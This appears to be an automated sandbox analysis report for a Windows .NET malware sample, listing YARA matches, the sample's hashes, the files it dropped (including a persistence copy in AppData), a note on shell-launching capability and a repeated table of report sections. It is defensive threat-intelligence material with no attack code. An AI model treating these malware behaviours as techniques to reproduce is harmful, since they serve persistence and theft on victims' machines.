Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: cmd.exe

17_2_00405671

ID:	652393
Product:	CloudBasic
Start time:	09:43:27
Start date:	26.06.2022
Sample:	kyFBQxVbsg.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	972334f0c55d0aeab0b32efe41ea3470
SHA1:	e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256:	eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qerdo.exe.log	ASCII text, with CRLF line terminators	EBFA21D930F1B37DA9DDD9D7E276F9DE	E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5	5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kyFBQxVbsg.exe.log	ASCII text, with CRLF line terminators	EBFA21D930F1B37DA9DDD9D7E276F9DE	E97B403CAA3A03D0E8BDAC6E66FFBE47555A38E5	5B9B2A9380AFEBEC985FA5745B9354DBBD4C889542B3EFE5446D24E8430A3752
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C5A56B913DEEDCF5AE01A2D4F8AA69CE	C91D19BFD666FDD02B0739893833D4E1C0316511	1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	EA4826E83AF1B21101CE6F68EF0B55C6	0046E23F0CC87039F220713239AD6B86DE91ABF0	279B8D0ADA726FE5DFB5E6A238E2FFD2FE1A16F971BCFB6B41E4034E0CB9AA88
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pshfc5wv.vht.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	972334F0C55D0AEAB0B32EFE41EA3470	E9097B5CD1F976ECAF0ACCEDF14F1D22BD72E6FA	EB91BF1E2EB3877F0942CEF113BB0FB76E2C2FD2C2651DBF09F6DA6DF649E8FB
C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\forbas\scxs.dat	data	0BC4CF36ABF59CC54AA5D472D55FAE99	FE3A6EB4A46CA56C855CA308EC96838C96C63AA2	9E6854C21A182D3224B40053CEE8BCF8C6E055C08D7ECE2ED6CDD6F7090C048E
C:\Users\user\Documents\20220626\PowerShell_transcript.128757.EFYe5VSb.20220626094450.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	34326C020EA634E84A3536E82DAFA6F8	A2C2D2F602436AC220AE61B1F43ECBE10DFE8292	4DB38969B245E4F1E94BFE1254F2A77D386F07717A5D61F7B964F4F3D091C8B0

Windows Analysis Report
kyFBQxVbsg.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report kyFBQxVbsg.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
kyFBQxVbsg.exe